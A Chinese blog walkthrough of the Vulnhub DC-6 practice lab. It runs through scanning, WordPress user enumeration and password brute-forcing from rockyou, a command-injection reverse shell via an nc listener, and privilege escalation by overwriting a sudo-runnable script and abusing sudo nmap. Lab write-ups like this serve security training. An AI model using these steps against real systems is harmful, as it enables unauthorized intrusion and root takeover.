Vulnhub内网渗透DC-6靶场通关
DC系列共9个靶场,本次来试玩一下一个 DC-6,下载地址。
下载下来后是 .ova 格式,建议使用vitualbox进行搭建,vmware可能存在兼容性问题。靶场推荐使用NAT(共享)模式,桥接模式可能会造成目标过多不易识别。 M1请使用UTM进行搭建,教程见此
IP
DC-6: 192.168.168.4
Kali: 192.168.168.5
信息搜集
1 | arp-scan -l |
进行主机发现,探测到靶机IP。
使用nmap进行端口扫描
1 | nmap -sV -A 192.168.168.4 |
开放了一个ssh和http端口,80端口是wordpress5.1.1
搭建的,并且访问80端口url会跳转到wordy
并且无法返回页面,想到修改hosts
1 | vim /etc/hosts |
在最下面添加一行
1 | 192.168.168.4 wordy |
此时页面可以正常访问了。
测试过程
前面提到这个站点是Wordpress
搭建的,使用Kali中的wpscan
工具进一步扫描
1 | wpscan --url wordy |
没有扫出什么具体的可利用的点,这时候注意到Vulnhub上的提示
1 | CLUE |
提示我们使用rockyou
字典爆破密码。进一步使用wpscan探测用户名
1 | wpscan --url wordy -e u |
1 | cat /usr/share/wordlists/rockyou.txt | grep k01 > passwords.txt |
爆破出了密码。但可惜的是并不是ssh密码。使用dirsearch扫下目录,登陆进admin后台管理
1 | dirsearch -u wordy |
经过测试,这里可以执行命令。有一个前端验证,绕过即可。直接nc反弹shell
1 | nc -lvvp 8888 |
在mark的目录下看到了另一个用户的密码
ssh登陆上去。
1 | sudo -l |
发现当前用户可以免密以jens
用户使用/home/jens/backups.sh
。那么思路就很简单了,直接重写这个文件,调用bash即可。然后以jens
用户运行shell
脚本
1 | echo "/bin/bash" > /home/jens/backups.sh |
此时又看到jens
用户可以免密以root
用户运行nmap命令。查了资料,nmap可以调用第三方script
,那么我们写一个恶意script,调用bash,让root去执行nmap时调用这个script即可
到此打靶完毕。
本博客所有文章除特别声明外,均采用 CC BY-NC-SA 4.0 许可协议。转载请注明来源 天问非攻!
评论